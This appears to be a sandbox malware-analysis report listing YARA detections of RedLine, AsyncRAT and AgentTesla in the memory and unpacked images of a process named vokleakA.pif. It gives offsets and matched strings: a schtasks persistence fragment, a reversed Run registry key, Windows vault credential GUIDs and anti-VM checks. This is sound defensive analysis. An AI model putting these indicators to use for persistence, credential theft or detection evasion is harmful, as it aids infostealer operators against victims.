00000009.00000001.2234454714.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000004.00000001.2001615999.0000000000450000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2200611596.0000000000450000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000001.2001615999.00000000004A0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x48aa7:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x9fbdf:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x57490:$a2: Stub.exe 0x57520:$a2: Stub.exe 0xae5c8:$a2: Stub.exe 0xae658:$a2: Stub.exe 0x3fd24:$a3: get_ActivatePong 0x96e5c:$a3: get_ActivatePong 0x48cbf:$a4: vmware 0x9fdf7:$a4: vmware 0x48b37:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x9fc6f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3fc49:$a6: get_SslClient 0x96d81:$a6: get_SslClient
00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x48b39:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x9fc71:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x47867:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient
00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000004.00000002.3207967153.0000000000450000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x47867:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient
00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000009.00000001.2234454714.00000000004A0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x48537:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56f20:$a2: Stub.exe 0x56fb0:$a2: Stub.exe 0x3f7b4:$a3: get_ActivatePong 0x4874f:$a4: vmware 0x485c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3f6d9:$a6: get_SslClient
00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x485c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x491a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4921a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x492a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x49336:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x493a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x49412:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x494a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x49538:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000004.00000002.3207967153.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x48aa7:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x9fbdf:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x57490:$a2: Stub.exe 0x57520:$a2: Stub.exe 0xae5c8:$a2: Stub.exe 0xae658:$a2: Stub.exe 0x3fd24:$a3: get_ActivatePong 0x96e5c:$a3: get_ActivatePong 0x48cbf:$a4: vmware 0x9fdf7:$a4: vmware 0x48b37:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x9fc6f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3fc49:$a6: get_SslClient 0x96d81:$a6: get_SslClient
00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x48b39:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x9fc71:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000007.00000002.2200611596.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2200611596.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000004.00000002.3229902141.000000002FEF7000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x27ba3:$x1: AsyncRAT 0x27be1:$x1: AsyncRAT 0x46163:$x1: AsyncRAT 0x461a1:$x1: AsyncRAT 0x46e77:$x1: AsyncRAT 0x46eb5:$x1: AsyncRAT
00000007.00000002.2200611596.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x48537:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56f20:$a2: Stub.exe 0x56fb0:$a2: Stub.exe 0x3f7b4:$a3: get_ActivatePong 0x4874f:$a4: vmware 0x485c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3f6d9:$a6: get_SslClient
00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x485c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x491a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4921a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x492a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x49336:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x493a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x49412:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x494a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x49538:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000000.00000003.2001613142.000000007EA30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x97ef:$x1: AsyncRAT 0x982d:$x1: AsyncRAT 0xf2c7:$x1: AsyncRAT 0xf305:$x1: AsyncRAT 0xf7cb:$x1: AsyncRAT 0xf809:$x1: AsyncRAT
00000009.00000001.2234454714.0000000000450000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000001.2149766444.00000000004A0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.2024259501.000000007EA80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x476c7:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x560b0:$a2: Stub.exe 0x56140:$a2: Stub.exe 0x3e944:$a3: get_ActivatePong 0x478df:$a4: vmware 0x47757:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e869:$a6: get_SslClient
00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x47759:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x47f9f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56988:$a2: Stub.exe 0x56a18:$a2: Stub.exe 0x3f21c:$a3: get_ActivatePong 0x481b7:$a4: vmware 0x4802f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3f141:$a6: get_SslClient
00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x48031:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2ca23:$x1: AsyncRAT 0x2ca61:$x1: AsyncRAT
00000007.00000002.2219281239.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x927a3:$x1: AsyncRAT 0x927e1:$x1: AsyncRAT
00000009.00000002.2320481183.0000000031EF1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x927a3:$x1: AsyncRAT 0x927e1:$x1: AsyncRAT
Process Memory Space: vokleakA.pif PID: 3716	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: vokleakA.pif PID: 3716	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vokleakA.pif PID: 3716	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: vokleakA.pif PID: 3716	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1ccb8:$x1: AsyncRAT 0x1ccea:$x1: AsyncRAT 0x22d900:$x1: AsyncRAT 0x22d932:$x1: AsyncRAT 0x264d97:$x1: AsyncRAT 0x264dc9:$x1: AsyncRAT 0x264df0:$x1: AsyncRAT 0x2aff84:$x1: AsyncRAT 0x2affb6:$x1: AsyncRAT 0x2b0a7b:$x1: AsyncRAT 0x2b0a8e:$x1: AsyncRAT 0x38988:$s6: VirtualBox 0x1429e9:$s6: VirtualBox 0x175510:$s6: VirtualBox 0x226fc2:$s6: VirtualBox 0x2a3c6a:$s6: VirtualBox 0x3893b:$s8: Win32_ComputerSystem 0x14299c:$s8: Win32_ComputerSystem 0x1754c3:$s8: Win32_ComputerSystem 0x1f926f:$s8: Win32_ComputerSystem 0x1f9325:$s8: Win32_ComputerSystem
Process Memory Space: vokleakA.pif PID: 6096	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: vokleakA.pif PID: 6096	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vokleakA.pif PID: 6096	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: vokleakA.pif PID: 6096	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf1dfb:$x1: AsyncRAT 0xf1e2d:$x1: AsyncRAT 0x13c157:$x1: AsyncRAT 0x13c189:$x1: AsyncRAT 0xddd72:$s6: VirtualBox 0x133767:$s6: VirtualBox 0x17e1b4:$s6: VirtualBox 0x1a5526:$s6: VirtualBox 0x1f676a:$s6: VirtualBox 0xddd25:$s8: Win32_ComputerSystem 0x13371a:$s8: Win32_ComputerSystem 0x17e167:$s8: Win32_ComputerSystem 0x1a54d9:$s8: Win32_ComputerSystem 0x1f671d:$s8: Win32_ComputerSystem
Process Memory Space: vokleakA.pif PID: 2072	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: vokleakA.pif PID: 2072	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vokleakA.pif PID: 2072	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: vokleakA.pif PID: 2072	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x248351:$x1: AsyncRAT 0x248383:$x1: AsyncRAT 0x148efe:$s6: VirtualBox 0x16ea50:$s6: VirtualBox 0x1b5586:$s6: VirtualBox 0x1cfcdc:$s6: VirtualBox 0x21b208:$s6: VirtualBox 0x148eb1:$s8: Win32_ComputerSystem 0x16ea03:$s8: Win32_ComputerSystem 0x1b5539:$s8: Win32_ComputerSystem 0x1cfc8f:$s8: Win32_ComputerSystem 0x21b1bb:$s8: Win32_ComputerSystem
Click to see the 129 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.vokleakA.pif.284a0000.7.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.vokleakA.pif.284a0000.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.vokleakA.pif.284a0000.7.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.vokleakA.pif.284a0000.7.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x46737:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x55120:$a2: Stub.exe 0x551b0:$a2: Stub.exe 0x3d9b4:$a3: get_ActivatePong 0x4694f:$a4: vmware 0x467c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3d8d9:$a6: get_SslClient
7.2.vokleakA.pif.284a0000.7.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x467c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.vokleakA.pif.284a0000.7.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x473a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4741a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x474a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x47536:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x475a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x47612:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x476a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x47738:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.vokleakA.pif.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.vokleakA.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
9.2.vokleakA.pif.34490000.6.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
9.2.vokleakA.pif.34490000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vokleakA.pif.34490000.6.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.vokleakA.pif.34490000.6.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x46737:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x55120:$a2: Stub.exe 0x551b0:$a2: Stub.exe 0x3d9b4:$a3: get_ActivatePong 0x4694f:$a4: vmware 0x467c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3d8d9:$a6: get_SslClient
9.2.vokleakA.pif.34490000.6.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x467c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.2.vokleakA.pif.34490000.6.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x473a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4741a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x474a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x47536:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x475a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x47612:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x476a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x47738:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.1.vokleakA.pif.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.1.vokleakA.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
9.2.vokleakA.pif.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
